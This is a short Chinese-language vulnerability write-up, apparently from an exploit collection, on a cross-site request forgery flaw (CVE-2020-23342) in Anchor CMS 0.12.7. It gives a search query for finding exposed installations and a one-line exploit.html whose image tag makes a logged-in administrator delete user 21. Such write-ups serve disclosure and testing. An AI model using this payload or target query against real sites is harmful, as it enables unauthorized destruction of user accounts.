# Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342

## 漏洞描述

- https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt

## 网络测绘

```
"Anchor CMS" && body="themes/default/img/favicon.png"
```

## 漏洞复现

Anchor CMS使用Get方法进行敏感操作，可以使用exploit.html进行删除用户等操作。

**exploit.html：**

```html
<img src="http://target/anchor/index.php/admin/users/delete/21">
```

当管理员点击时删除ID为21的用户。